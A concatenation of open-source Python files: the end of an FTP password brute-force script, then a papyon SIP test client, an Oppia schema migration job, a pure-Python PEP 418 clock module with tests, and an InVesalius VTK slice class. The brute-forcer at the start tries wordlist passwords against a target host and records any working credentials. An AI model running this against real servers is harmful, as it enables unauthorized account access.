if arg.lower() == '-t' or arg.lower() == '--target':
hostname = sys.argv[int(sys.argv[1:].index(arg))+2]
elif arg.lower() == '-u' or arg.lower() == '--user':
user = sys.argv[int(sys.argv[1:].index(arg))+2]
elif arg.lower() == '-w' or arg.lower() == '--wordlist':
wordlist = sys.argv[int(sys.argv[1:].index(arg))+2]
elif arg.lower() == '-h' or arg.lower() == '--help':
HelpMe()
elif len(sys.argv) <= 1:
HelpMe()
def BruteForce(word) :
print "[?]Trying :",word
file.write("\n[?]Trying :"+word)
try:
ftp = FTP(hostname)
ftp.login(user, word)
ftp.retrlines('list')
ftp.quit()
print "\n\t[!] Login Success ! "
print "\t[!] Username : ",user, ""
print "\t[!] Password : ",word, ""
print "\t[!] Hostname : ",hostname, ""
print "\t[!] Log all has been saved to",log,"\n"
file.write("\n\n\t[!] Login Success ! ")
file.write("\n\t[!] Username : "+user )
file.write("\n\t[!] Password : "+word )
file.write("\n\t[!] Hostname : "+hostname)
file.write("\n\t[!] Log all has been saved to "+log)
sys.exit(1)
except Exception, e:
#print "[-] Failed"
pass
except KeyboardInterrupt:
print "\n[-] Aborting...\n"
file.write("\n[-] Aborting...\n")
sys.exit(1)
def Action ():
MyFace()
print "[!] Starting attack at %s" % time.strftime("%X")
print "[!] System Activated for brute forcing..."
print "[!] Please wait until brute forcing finish !\n"
file.write("\n[!] Starting attack at %s" % time.strftime("%X"))
file.write("\n[!] System Activated for brute forcing...")
file.write("\n[!] Please wait until brute forcing finish !\n")
Action()
try:
words = open(wordlist, "r").readlines()
except(IOError):
print "\n[-] Error: Check your wordlist path\n"
file.write("\n[-] Error: Check your wordlist path\n")
sys.exit(1)
print "\n[+] Loaded:",len(words),"words"
print "[+] Server:",hostname
print "[+] User:",user
print "[+] BruteForcing...\n"
for word in words:
BruteForce(word.replace("\n",""))
file.close()
| knightmare2600/d4rkc0de | others/ftpbrute.py | Python | gpl-2.0 | 8,051 |
# -*- coding: utf-8 -*-
#
# papyon - a python client library for Msn
#
# Copyright (C) 2010 Collabora Ltd.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
from base import *
sys.path.insert(0, "")
import papyon
from papyon.media.conference import *
from papyon.media.constants import *
class SIPClient(TestClient):
def __init__(self):
opts = [('-a', '--answer', {'type': 'choice', 'default': 'ignore',
'choices': ('ignore', 'accept', 'reject'),
'help': 'what to do on incoming call'}),
('-i', '--invite', {'type': 'string', 'default': '',
'help': 'peer to send call invite to'})
]
args = []
TestClient.__init__(self, "SIP Call", opts, args, SIPClientEvents)
def connected(self):
self.profile.presence = papyon.profile.Presence.ONLINE
self.profile.client_capabilities.has_webcam = True
self.profile.client_capabilities.supports_rtc_video = True
if self.options.invite:
gobject.timeout_add_seconds(2, self.invite)
def invite(self):
contact = self.address_book.search_contact(self.options.invite,
papyon.profile.NetworkID.MSN)
if contact is None:
print 'Unknown contact: %s' % self.options.invite
return False
call = self.call_manager.create_call(contact)
self.call_handler = CallEvents(call)
self.session_handler = MediaSessionHandler(call.media_session)
stream = call.media_session.create_stream("audio",
MediaStreamDirection.BOTH, True)
call.media_session.add_stream(stream)
stream = call.media_session.create_stream("video",
MediaStreamDirection.BOTH, True)
call.media_session.add_stream(stream)
call.invite()
return False
class SIPClientEvents(TestClientEvents):
def __init__(self, client):
TestClientEvents.__init__(self, client)
def on_invite_conference(self, call):
print "INVITED : call-id = %s" % call.id
self.call_handler = CallEvents(call)
self.session_handler = MediaSessionHandler(call.media_session)
call.ring()
if self._client.options.answer == 'accept':
call.accept()
elif self._client.options.answer == 'reject':
call.reject()
class CallEvents(papyon.event.CallEventInterface):
def __init__(self, call):
papyon.event.CallEventInterface.__init__(self, call)
if __name__ == "__main__":
client = SIPClient()
client.run()
| billiob/papyon | tests/test_sip_client.py | Python | gpl-2.0 | 3,295 |
# coding: utf-8
#
# Copyright 2017 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""One-off jobs for collections."""
import logging
from core import jobs
from core.domain import collection_domain
from core.domain import collection_services
from core.platform import models
import feconf
(base_models, collection_models,) = models.Registry.import_models([
models.NAMES.base_model, models.NAMES.collection])
class CollectionMigrationJob(jobs.BaseMapReduceJobManager):
"""A reusable one-time job that may be used to migrate collection schema
versions. This job will load all existing collections from the data store
and immediately store them back into the data store. The loading process of
a collection in collection_services automatically performs schema updating.
This job persists that conversion work, keeping collections up-to-date and
improving the load time of new collections.
"""
_DELETED_KEY = 'collection_deleted'
_ERROR_KEY = 'validation_error'
_MIGRATED_KEY = 'collection_migrated'
@classmethod
def entity_classes_to_map_over(cls):
return [collection_models.CollectionModel]
@staticmethod
def map(item):
if item.deleted:
yield (CollectionMigrationJob._DELETED_KEY,
'Encountered deleted collection.')
return
# Note: the read will bring the collection up to the newest version.
collection = collection_services.get_collection_by_id(item.id)
try:
collection.validate(strict=False)
except Exception as e:
logging.error(
'Collection %s failed validation: %s' % (item.id, e))
yield (CollectionMigrationJob._ERROR_KEY,
'Collection %s failed validation: %s' % (item.id, e))
return
# Write the new collection into the datastore if it's different from
# the old version.
if item.schema_version <= feconf.CURRENT_COLLECTION_SCHEMA_VERSION:
commit_cmds = [{
'cmd': collection_domain.CMD_MIGRATE_SCHEMA_TO_LATEST_VERSION,
'from_version': item.schema_version,
'to_version': str(
feconf.CURRENT_COLLECTION_SCHEMA_VERSION)
}]
collection_services.update_collection(
feconf.MIGRATION_BOT_USERNAME, item.id, commit_cmds,
'Update collection schema version to %d.' % (
feconf.CURRENT_COLLECTION_SCHEMA_VERSION))
yield (CollectionMigrationJob._MIGRATED_KEY,
'Collection successfully migrated.')
@staticmethod
def reduce(key, values):
yield (key, values)
| shaz13/oppia | core/domain/collection_jobs_one_off.py | Python | apache-2.0 | 3,258 |
"""
from: https://bitbucket.org/haypo/misc/src/tip/python/pep418.py
Implementation of the PEP 418 in pure Python using ctypes.
Functions:
- clock()
- get_clock_info(name)
- monotonic(): not always available
- perf_frequency()
- process_time()
- sleep()
- time()
Constants:
- has_monotonic (bool): True if time.monotonic() is available
"""
# flake8: noqa
# TODO: gethrtime() for Solaris/OpenIndiana
# TODO: call GetSystemTimeAdjustment() to get the resolution
# TODO: other FIXME
import os
import sys
import time as python_time
has_mach_absolute_time = False
has_clock_gettime = False
has_gettimeofday = False
has_ftime = False
has_delay = False
has_libc_time = False
has_libc_clock = False
has_libc_sleep = False
has_GetTickCount64 = False
CLOCK_REALTIME = None
CLOCK_MONOTONIC = None
CLOCK_PROCESS_CPUTIME_ID = None
CLOCK_HIGHRES = None
CLOCK_PROF = None
try:
import ctypes
import ctypes.util
from ctypes import POINTER
from ctypes import byref
except ImportError as err:
pass
else:
def ctypes_oserror():
errno = ctypes.get_errno()
message = os.strerror(errno)
return OSError(errno, message)
time_t = ctypes.c_long
if os.name == "nt":
from ctypes import windll
from ctypes.wintypes import BOOL
from ctypes.wintypes import DWORD
from ctypes.wintypes import FILETIME
from ctypes.wintypes import HANDLE
LARGEINTEGER = ctypes.c_int64
LARGEINTEGER_p = POINTER(LARGEINTEGER)
FILETIME_p = POINTER(FILETIME)
ULONGLONG = ctypes.c_uint64
def ctypes_winerror():
errno = ctypes.get_errno()
message = os.strerror(errno)
return WindowsError(errno, message)
_QueryPerformanceFrequency = windll.kernel32.QueryPerformanceFrequency
_QueryPerformanceFrequency.restype = BOOL
_QueryPerformanceFrequency.argtypes = (LARGEINTEGER_p,)
def QueryPerformanceFrequency():
frequency = LARGEINTEGER()
ok = _QueryPerformanceFrequency(byref(frequency))
if not ok:
raise ctypes_winerror()
return int(frequency.value)
_QueryPerformanceCounter = windll.kernel32.QueryPerformanceCounter
_QueryPerformanceCounter.restype = BOOL
_QueryPerformanceCounter.argtypes = (LARGEINTEGER_p,)
def QueryPerformanceCounter():
frequency = LARGEINTEGER()
ok = _QueryPerformanceCounter(byref(frequency))
if not ok:
raise ctypes_winerror()
return int(frequency.value)
GetTickCount = windll.kernel32.GetTickCount
GetTickCount.restype = DWORD
GetTickCount.argtypes = ()
if hasattr(windll.kernel32, 'GetTickCount64'):
GetTickCount64 = windll.kernel32.GetTickCount64
GetTickCount64.restype = ULONGLONG
GetTickCount64.argtypes = ()
has_GetTickCount64 = True
GetCurrentProcess = windll.kernel32.GetCurrentProcess
GetCurrentProcess.argtypes = ()
GetCurrentProcess.restype = HANDLE
_GetProcessTimes = windll.kernel32.GetProcessTimes
_GetProcessTimes.argtypes = (HANDLE, FILETIME_p, FILETIME_p, FILETIME_p, FILETIME_p)
_GetProcessTimes.restype = BOOL
def filetime2py(obj):
return (obj.dwHighDateTime << 32) + obj.dwLowDateTime
def GetProcessTimes(handle):
creation_time = FILETIME()
exit_time = FILETIME()
kernel_time = FILETIME()
user_time = FILETIME()
ok = _GetProcessTimes(handle,
byref(creation_time), byref(exit_time),
byref(kernel_time), byref(user_time))
if not ok:
raise ctypes_winerror()
return (filetime2py(creation_time), filetime2py(exit_time),
filetime2py(kernel_time), filetime2py(user_time))
_GetSystemTimeAsFileTime = windll.kernel32.GetSystemTimeAsFileTime
_GetSystemTimeAsFileTime.argtypes = (FILETIME_p,)
_GetSystemTimeAsFileTime.restype = None
def GetSystemTimeAsFileTime():
system_time = FILETIME()
_GetSystemTimeAsFileTime(byref(system_time))
return filetime2py(system_time)
libc_name = ctypes.util.find_library('c')
if libc_name:
libc = ctypes.CDLL(libc_name, use_errno=True)
clock_t = ctypes.c_ulong
if sys.platform == 'darwin':
mach_absolute_time = libc.mach_absolute_time
mach_absolute_time.argtypes = ()
mach_absolute_time.restype = ctypes.c_uint64
has_mach_absolute_time = True
class mach_timebase_info_data_t(ctypes.Structure):
_fields_ = (
('numer', ctypes.c_uint32),
('denom', ctypes.c_uint32),
)
mach_timebase_info_data_p = POINTER(mach_timebase_info_data_t)
_mach_timebase_info = libc.mach_timebase_info
_mach_timebase_info.argtypes = (mach_timebase_info_data_p,)
_mach_timebase_info.restype = ctypes.c_int
def mach_timebase_info():
timebase = mach_timebase_info_data_t()
_mach_timebase_info(byref(timebase))
return (timebase.numer, timebase.denom)
_libc_clock = libc.clock
_libc_clock.argtypes = ()
_libc_clock.restype = clock_t
has_libc_clock = True
if hasattr(libc, 'sleep'):
_libc_sleep = libc.sleep
_libc_sleep.argtypes = (ctypes.c_uint,)
_libc_sleep.restype = ctypes.c_uint
has_libc_sleep = True
if hasattr(libc, 'gettimeofday'):
class timeval(ctypes.Structure):
_fields_ = (
('tv_sec', time_t),
('tv_usec', ctypes.c_long),
)
timeval_p = POINTER(timeval)
timezone_p = ctypes.c_void_p
_gettimeofday = libc.gettimeofday
# FIXME: some platforms only expect one argument
_gettimeofday.argtypes = (timeval_p, timezone_p)
_gettimeofday.restype = ctypes.c_int
def gettimeofday():
tv = timeval()
err = _gettimeofday(byref(tv), None)
if err:
raise ctypes_oserror()
return tv
has_gettimeofday = True
time_t_p = POINTER(time_t)
if hasattr(libc, 'time'):
_libc__time = libc.time
_libc__time.argtypes = (time_t_p,)
_libc__time.restype = time_t
def _libc_time():
return _libc__time(None)
has_libc_time = True
if sys.platform.startswith(("freebsd", "openbsd")):
librt_name = libc_name
else:
librt_name = ctypes.util.find_library('rt')
if librt_name:
librt = ctypes.CDLL(librt_name, use_errno=True)
if hasattr(librt, 'clock_gettime'):
clockid_t = ctypes.c_int
class timespec(ctypes.Structure):
_fields_ = (
('tv_sec', time_t),
('tv_nsec', ctypes.c_long),
)
timespec_p = POINTER(timespec)
_clock_gettime = librt.clock_gettime
_clock_gettime.argtypes = (clockid_t, timespec_p)
_clock_gettime.restype = ctypes.c_int
def clock_gettime(clk_id):
ts = timespec()
err = _clock_gettime(clk_id, byref(ts))
if err:
raise ctypes_oserror()
return ts.tv_sec + ts.tv_nsec * 1e-9
has_clock_gettime = True
_clock_settime = librt.clock_settime
_clock_settime.argtypes = (clockid_t, timespec_p)
_clock_settime.restype = ctypes.c_int
def clock_settime(clk_id, value):
ts = timespec()
ts.tv_sec = int(value)
ts.tv_nsec = int(float(abs(value)) % 1.0 * 1e9)
err = _clock_settime(clk_id, byref(ts))
if err:
raise ctypes_oserror()
return ts.tv_sec + ts.tv_nsec * 1e-9
_clock_getres = librt.clock_getres
_clock_getres.argtypes = (clockid_t, timespec_p)
_clock_getres.restype = ctypes.c_int
def clock_getres(clk_id):
ts = timespec()
err = _clock_getres(clk_id, byref(ts))
if err:
raise ctypes_oserror()
return ts.tv_sec + ts.tv_nsec * 1e-9
if sys.platform.startswith("linux"):
CLOCK_REALTIME = 0
CLOCK_MONOTONIC = 1
CLOCK_PROCESS_CPUTIME_ID = 2
elif sys.platform.startswith("freebsd"):
CLOCK_REALTIME = 0
CLOCK_PROF = 2
CLOCK_MONOTONIC = 4
elif sys.platform.startswith("openbsd"):
CLOCK_REALTIME = 0
CLOCK_MONOTONIC = 3
elif sys.platform.startswith("sunos"):
CLOCK_REALTIME = 3
CLOCK_HIGHRES = 4
# clock_gettime(CLOCK_PROCESS_CPUTIME_ID) fails with errno 22
# on OpenSolaris
# CLOCK_PROCESS_CPUTIME_ID = 5
def _clock_gettime_info(use_info, clk_id):
value = clock_gettime(clk_id)
if use_info:
name = {
CLOCK_MONOTONIC: 'CLOCK_MONOTONIC',
CLOCK_PROF: 'CLOCK_PROF',
CLOCK_HIGHRES: 'CLOCK_HIGHRES',
CLOCK_PROCESS_CPUTIME_ID: 'CLOCK_PROCESS_CPUTIME_ID',
CLOCK_REALTIME: 'CLOCK_REALTIME',
}[clk_id]
try:
resolution = clock_getres(clk_id)
except OSError:
resolution = 1e-9
info = {
'implementation': 'clock_gettime(%s)' % name,
'resolution': resolution,
}
if clk_id in (CLOCK_MONOTONIC, CLOCK_PROF, CLOCK_HIGHRES, CLOCK_PROCESS_CPUTIME_ID):
info['monotonic'] = True
info['adjustable'] = False
elif clk_id in (CLOCK_REALTIME,):
info['monotonic'] = False
info['adjustable'] = True
else:
info = None
return (value, info)
has_monotonic = False
if os.name == 'nt':
# GetTickCount64() requires Windows Vista, Server 2008 or later
if has_GetTickCount64:
def _monotonic(use_info):
value = GetTickCount64() * 1e-3
if use_info:
info = {
'implementation': "GetTickCount64()",
"monotonic": True,
"resolution": 1e-3,
"adjustable": False,
}
# FIXME: call GetSystemTimeAdjustment() to get the resolution
else:
info = None
return (value, info)
has_monotonic = True
else:
def _monotonic(use_info):
ticks = GetTickCount()
if ticks < _monotonic.last:
# Integer overflow detected
_monotonic.delta += 2**32
_monotonic.last = ticks
value = (ticks + _monotonic.delta) * 1e-3
if use_info:
info = {
'implementation': "GetTickCount()",
"monotonic": True,
"resolution": 1e-3,
"adjustable": False,
}
# FIXME: call GetSystemTimeAdjustment() to get the resolution
else:
info = None
return (value, info)
_monotonic.last = 0
_monotonic.delta = 0
has_monotonic = True
elif has_mach_absolute_time:
def _monotonic(use_info):
if _monotonic.factor is None:
timebase = mach_timebase_info()
_monotonic.factor = timebase[0] / timebase[1] * 1e-9
value = mach_absolute_time() * _monotonic.factor
if use_info:
info = {
'implementation': "mach_absolute_time()",
'resolution': _monotonic.factor,
'monotonic': True,
'adjustable': False,
}
else:
info = None
return (value, info)
_monotonic.factor = None
has_monotonic = True
elif has_clock_gettime and CLOCK_HIGHRES is not None:
def _monotonic(use_info):
return _clock_gettime_info(use_info, CLOCK_HIGHRES)
has_monotonic = True
elif has_clock_gettime and CLOCK_MONOTONIC is not None:
def _monotonic(use_info):
return _clock_gettime_info(use_info, CLOCK_MONOTONIC)
has_monotonic = True
if has_monotonic:
def monotonic():
return _monotonic(False)[0]
def _perf_counter(use_info):
info = None
if _perf_counter.use_performance_counter:
if _perf_counter.performance_frequency is None:
value, info = _win_perf_counter(use_info)
if value is not None:
return (value, info)
if _perf_counter.use_monotonic:
# The monotonic clock is preferred over the system time
try:
return _monotonic(use_info)
except (OSError, WindowsError):
_perf_counter.use_monotonic = False
return _time(use_info)
_perf_counter.use_performance_counter = (os.name == 'nt')
if _perf_counter.use_performance_counter:
_perf_counter.performance_frequency = None
_perf_counter.use_monotonic = has_monotonic
def perf_counter():
return _perf_counter(False)[0]
if os.name == 'nt':
def _process_time(use_info):
handle = GetCurrentProcess()
process_times = GetProcessTimes(handle)
value = (process_times[2] + process_times[3]) * 1e-7
if use_info:
info = {
"implementation": "GetProcessTimes()",
"resolution": 1e-7,
"monotonic": True,
"adjustable": False,
# FIXME: call GetSystemTimeAdjustment() to get the resolution
}
else:
info = None
return (value, info)
else:
import os
try:
import resource
except ImportError:
has_resource = False
else:
has_resource = True
def _process_time(use_info):
info = None
if _process_time.clock_id is not None:
try:
return _clock_gettime_info(use_info, _process_time.clock_id)
except OSError:
_process_time.clock_id = None
if _process_time.use_getrusage:
try:
usage = resource.getrusage(resource.RUSAGE_SELF)
value = usage[0] + usage[1]
except OSError:
_process_time.use_getrusage = False
else:
if use_info:
info = {
"implementation": "getrusage(RUSAGE_SELF)",
"resolution": 1e-6,
"monotonic": True,
"adjustable": False,
}
return (value, info)
if _process_time.use_times:
try:
times = os.times()
value = times[0] + times[1]
except OSError:
_process_time.use_getrusage = False
else:
if use_info:
try:
ticks_per_second = os.sysconf("SC_CLK_TCK")
except ValueError:
ticks_per_second = 60 # FIXME: get HZ constant
info = {
"implementation": "times()",
"resolution": 1.0 / ticks_per_second,
"monotonic": True,
"adjustable": False,
}
return (value, info)
return _libc_clock_info(use_info)
if has_clock_gettime and CLOCK_PROCESS_CPUTIME_ID is not None:
_process_time.clock_id = CLOCK_PROCESS_CPUTIME_ID
elif has_clock_gettime and CLOCK_PROF is not None:
_process_time.clock_id = CLOCK_PROF
else:
_process_time.clock_id = None
_process_time.use_getrusage = has_resource
# On OS/2, only the 5th field of os.times() is set, others are zeros
_process_time.use_times = (hasattr(os, 'times') and os.name != 'os2')
def process_time():
return _process_time(False)[0]
if os.name == "nt":
def _time(use_info):
value = GetSystemTimeAsFileTime() * 1e-7
if use_info:
info = {
'implementation': 'GetSystemTimeAsFileTime',
'resolution': 1e-7,
'monotonic': False,
# FIXME: call GetSystemTimeAdjustment() to get the resolution
# and adjustable
}
else:
info = None
return (value, info)
else:
def _time(use_info):
info = None
if has_clock_gettime and CLOCK_REALTIME is not None:
try:
return _clock_gettime_info(use_info, CLOCK_REALTIME)
except OSError:
# CLOCK_REALTIME is not supported (unlikely)
pass
if has_gettimeofday:
try:
tv = gettimeofday()
except OSError:
# gettimeofday() should not fail
pass
else:
if use_info:
info = {
'monotonic': False,
"implementation": "gettimeofday()",
"resolution": 1e-6,
'monotonic': False,
'adjustable': True,
}
value = tv.tv_sec + tv.tv_usec * 1e-6
return (value, info)
# FIXME: implement ftime()
if has_ftime:
if use_info:
info = {
"implementation": "ftime()",
"resolution": 1e-3,
'monotonic': False,
'adjustable': True,
}
value = ftime()
elif has_libc_time:
if use_info:
info = {
"implementation": "time()",
"resolution": 1.0,
'monotonic': False,
'adjustable': True,
}
value = float(_libc_time())
else:
if use_info:
info = {
"implementation": "time.time()",
'monotonic': False,
'adjustable': True,
}
if os.name == "nt":
# On Windows, time.time() uses ftime()
info["resolution"] = 1e-3
else:
# guess that time.time() uses gettimeofday()
info["resolution"] = 1e-6
value = python_time.time()
return (value, info)
def time():
return _time(False)[0]
try:
import select
except ImportError:
has_select = False
else:
# FIXME: On Windows, select.select([], [], [], seconds) fails with
# select.error(10093)
has_select = (hasattr(select, "select") and os.name != "nt")
if has_select:
def _sleep(seconds):
return select.select([], [], [], seconds)
elif has_delay:
def _sleep(seconds):
milliseconds = int(seconds * 1000)
# FIXME
delay(milliseconds)
#elif os.name == "nt":
# def _sleep(seconds):
# milliseconds = int(seconds * 1000)
# # FIXME: use ctypes
# win32api.ResetEvent(hInterruptEvent);
# win32api.WaitForSingleObject(sleep.sigint_event, milliseconds)
#
# sleep.sigint_event = win32api.CreateEvent(NULL, TRUE, FALSE, FALSE)
# # SetEvent(sleep.sigint_event) will be called by the signal handler of SIGINT
elif os.name == "os2":
def _sleep(seconds):
milliseconds = int(seconds * 1000)
# FIXME
DosSleep(milliseconds)
elif has_libc_sleep:
def _sleep(seconds):
seconds = int(seconds)
_libc_sleep(seconds)
else:
def _sleep(seconds):
python_time.sleep(seconds)
def sleep(seconds):
if seconds < 0:
raise ValueError("sleep length must be non-negative")
_sleep(seconds)
def _libc_clock_info(use_info):
if use_info:
info = {
'implementation': 'clock()',
'resolution': 1.0,
# FIXME: 'resolution': 1.0 / CLOCKS_PER_SEC,
'monotonic': True,
'adjustable': False,
}
if os.name != "nt":
info['monotonic'] = True
else:
info = None
if has_libc_clock:
value = _libc_clock()
if use_info:
info['implementation'] = 'clock()'
else:
value = python_time.clock()
if use_info:
info['implementation'] = 'time.clock()'
return (value, info)
def _win_perf_counter(use_info):
if _win_perf_counter.perf_frequency is None:
try:
_win_perf_counter.perf_frequency = float(QueryPerformanceFrequency())
except WindowsError:
# QueryPerformanceFrequency() fails if the installed
# hardware does not support a high-resolution performance
# counter
return (None, None)
value = QueryPerformanceCounter() / _win_perf_counter.perf_frequency
if use_info:
info = {
'implementation': 'QueryPerformanceCounter',
'resolution': 1.0 / _win_perf_counter.perf_frequency,
'monotonic': True,
'adjustable': False,
}
else:
info = None
return (value, info)
_win_perf_counter.perf_frequency = None
if os.name == 'nt':
def _clock(use_info):
info = None
if _clock.use_performance_counter:
value, info = _win_perf_counter(use_info)
if value is not None:
return (value, info)
return _libc_clock_info(use_info)
_clock.use_performance_counter = True
else:
def _clock(use_info):
return _libc_clock_info(use_info)
def clock():
return _clock(False)[0]
class clock_info(object):
def __init__(self, implementation, monotonic, adjustable, resolution):
self.implementation = implementation
self.monotonic = monotonic
self.adjustable = adjustable
self.resolution = resolution
def __repr__(self):
return (
'clockinfo(adjustable=%s, implementation=%r, monotonic=%s, resolution=%s'
% (self.adjustable, self.implementation, self.monotonic, self.resolution))
def get_clock_info(name):
if name == 'clock':
info = _clock(True)[1]
elif name == 'perf_counter':
info = _perf_counter(True)[1]
elif name == 'process_time':
info = _process_time(True)[1]
elif name == 'time':
info = _time(True)[1]
elif has_monotonic and name == 'monotonic':
info = _monotonic(True)[1]
else:
raise ValueError("unknown clock: %s" % name)
return clock_info(**info)
if __name__ == "__main__":
import threading
import unittest
from errno import EPERM
class TestPEP418(unittest.TestCase):
if not hasattr(unittest.TestCase, 'assertIsInstance'):
# Python < 2.7 or Python < 3.2
def assertIsInstance(self, obj, klass):
self.assertTrue(isinstance(obj, klass))
def assertGreater(self, a, b):
self.assertTrue(a > b)
def assertLess(self, a, b):
self.assertTrue(a < b)
def assertLessEqual(self, a, b):
self.assertTrue(a <= b)
def assertAlmostEqual(self, first, second, delta):
self.assertTrue(abs(first - second) <= delta)
def test_clock(self):
clock()
info = get_clock_info('clock')
self.assertEqual(info.monotonic, True)
self.assertEqual(info.adjustable, False)
def test_get_clock_info(self):
clocks = ['clock', 'perf_counter', 'process_time', 'time']
if has_monotonic:
clocks.append('monotonic')
for name in clocks:
info = get_clock_info(name)
self.assertIsInstance(info.implementation, str)
self.assertNotEqual(info.implementation, '')
self.assertIsInstance(info.monotonic, bool)
self.assertIsInstance(info.resolution, float)
# 0 < resolution <= 1.0
self.assertGreater(info.resolution, 0)
self.assertLessEqual(info.resolution, 1)
self.assertIsInstance(info.adjustable, bool)
self.assertRaises(ValueError, get_clock_info, 'xxx')
if not has_monotonic:
print("Skip test_monotonic: need time.monotonic")
else:
def test_monotonic(self):
t1 = monotonic()
python_time.sleep(0.1)
t2 = monotonic()
dt = t2 - t1
self.assertGreater(t2, t1)
self.assertAlmostEqual(dt, 0.1, delta=0.2)
info = get_clock_info('monotonic')
self.assertEqual(info.monotonic, True)
self.assertEqual(info.adjustable, False)
if not has_monotonic or not has_clock_gettime:
if not has_monotonic:
print('Skip test_monotonic_settime: need time.monotonic')
elif not has_clock_gettime:
print('Skip test_monotonic_settime: need time.clock_settime')
else:
def test_monotonic_settime(self):
t1 = monotonic()
realtime = clock_gettime(CLOCK_REALTIME)
# jump backward with an offset of 1 hour
try:
clock_settime(CLOCK_REALTIME, realtime - 3600)
except OSError as err:
if err.errno == EPERM:
if hasattr(unittest, 'SkipTest'):
raise unittest.SkipTest(str(err))
else:
print("Skip test_monotonic_settime: %s" % err)
return
else:
raise
t2 = monotonic()
clock_settime(CLOCK_REALTIME, realtime)
# monotonic must not be affected by system clock updates
self.assertGreaterEqual(t2, t1)
def test_perf_counter(self):
perf_counter()
def test_process_time(self):
start = process_time()
python_time.sleep(0.1)
stop = process_time()
self.assertLess(stop - start, 0.01)
info = get_clock_info('process_time')
self.assertEqual(info.monotonic, True)
self.assertEqual(info.adjustable, False)
def test_process_time_threads(self):
class BusyThread(threading.Thread):
def run(self):
while not self.stop:
pass
thread = BusyThread()
thread.stop = False
t1 = process_time()
thread.start()
sleep(0.2)
t2 = process_time()
thread.stop = True
thread.join()
self.assertGreater(t2 - t1, 0.1)
def test_sleep(self):
self.assertRaises(ValueError, sleep, -2)
self.assertRaises(ValueError, sleep, -1)
sleep(1.2)
def test_time(self):
value = time()
self.assertIsInstance(value, float)
info = get_clock_info('time')
self.assertEqual(info.monotonic, False)
self.assertEqual(info.adjustable, True)
if True:
from pprint import pprint
print("clock: %s" % clock())
if has_monotonic:
print("monotonic: %s" % monotonic())
else:
print("monotonic: <not available>")
print("perf_counter: %s" % perf_counter())
print("process_time: %s" % process_time())
print("time: %s" % time())
clocks = ['clock', 'perf_counter', 'process_time', 'time']
if has_monotonic:
clocks.append('monotonic')
pprint(dict((name, get_clock_info(name)) for name in clocks))
unittest.main()
| ionelmc/pytest-benchmark | src/pytest_benchmark/pep418.py | Python | bsd-2-clause | 28,504 |
#--------------------------------------------------------------------------
# Software: InVesalius - Software de Reconstrucao 3D de Imagens Medicas
# Copyright: (C) 2001 Centro de Pesquisas Renato Archer
# Homepage: http://www.softwarepublico.gov.br
# Contact: [email protected]
# License: GNU - GPL 2 (LICENSE.txt/LICENCA.txt)
#--------------------------------------------------------------------------
# Este programa e software livre; voce pode redistribui-lo e/ou
# modifica-lo sob os termos da Licenca Publica Geral GNU, conforme
# publicada pela Free Software Foundation; de acordo com a versao 2
# da Licenca.
#
# Este programa eh distribuido na expectativa de ser util, mas SEM
# QUALQUER GARANTIA; sem mesmo a garantia implicita de
# COMERCIALIZACAO ou de ADEQUACAO A QUALQUER PROPOSITO EM
# PARTICULAR. Consulte a Licenca Publica Geral GNU para obter mais
# detalhes.
#--------------------------------------------------------------------------
import vtk
import constants as const
import vtk_utils as vu
BORDER_UP = 1
BORDER_DOWN = 2
BORDER_LEFT = 4
BORDER_RIGHT = 8
BORDER_ALL = BORDER_UP | BORDER_DOWN | BORDER_LEFT | BORDER_RIGHT
BORDER_NONE = 0
class SliceData(object):
def __init__(self):
self.actor = None
self.cursor = None
self.text = None
self.number = 0
self.orientation = 'AXIAL'
self.renderer = None
self.__create_text()
self.__create_box()
def __create_text(self):
colour = const.ORIENTATION_COLOUR[self.orientation]
text = vu.TextZero()
text.SetColour(colour)
text.SetSize(const.TEXT_SIZE_LARGE)
text.SetPosition(const.TEXT_POS_LEFT_DOWN_ZERO)
#text.SetVerticalJustificationToBottom()
text.SetValue(self.number)
self.text = text
def __create_line_actor(self, line):
line_mapper = vtk.vtkPolyDataMapper2D()
line_mapper.SetInput(line.GetOutput())
line_actor = vtk.vtkActor2D()
line_actor.SetMapper(line_mapper)
return line_actor
def __create_box(self):
xi = yi = 0.1
xf = yf = 200
line_i = vtk.vtkLineSource()
line_i.SetPoint1((xi, yi, 0))
line_i.SetPoint2((xf, yi, 0))
self.line_i = line_i
self.line_i_actor = self.__create_line_actor(line_i)
line_s = vtk.vtkLineSource()
line_s.SetPoint1((xi, yf, 0))
line_s.SetPoint2((xf, yf, 0))
self.line_s = line_s
self.line_s_actor = self.__create_line_actor(line_s)
line_l = vtk.vtkLineSource()
line_l.SetPoint1((xi, yi, 0))
line_l.SetPoint2((xi, yf, 0))
self.line_l = line_l
self.line_l_actor = self.__create_line_actor(line_l)
line_r = vtk.vtkLineSource()
line_r.SetPoint1((xf, yi, 0))
line_r.SetPoint2((xf, yf, 0))
self.line_r = line_r
self.line_r_actor = self.__create_line_actor(line_r)
box_actor = vtk.vtkPropAssembly()
box_actor.AddPart(self.line_i_actor)
box_actor.AddPart(self.line_s_actor)
box_actor.AddPart(self.line_l_actor)
box_actor.AddPart(self.line_r_actor)
self.box_actor = box_actor
def __set_border_colours(self, colours_borders):
for colour, actors in colours_borders.items():
for actor in actors:
actor.GetProperty().SetColor(colour)
def SetBorderStyle(self, style=BORDER_NONE):
colour_e = const.ORIENTATION_COLOUR[self.orientation]
colour_i = (1, 1, 1)
extern_borders = []
intern_borders = []
if style & BORDER_UP:
extern_borders.append(self.line_s_actor)
else:
intern_borders.append(self.line_s_actor)
if style & BORDER_DOWN:
extern_borders.append(self.line_i_actor)
else:
intern_borders.append(self.line_i_actor)
if style & BORDER_LEFT:
extern_borders.append(self.line_l_actor)
else:
intern_borders.append(self.line_l_actor)
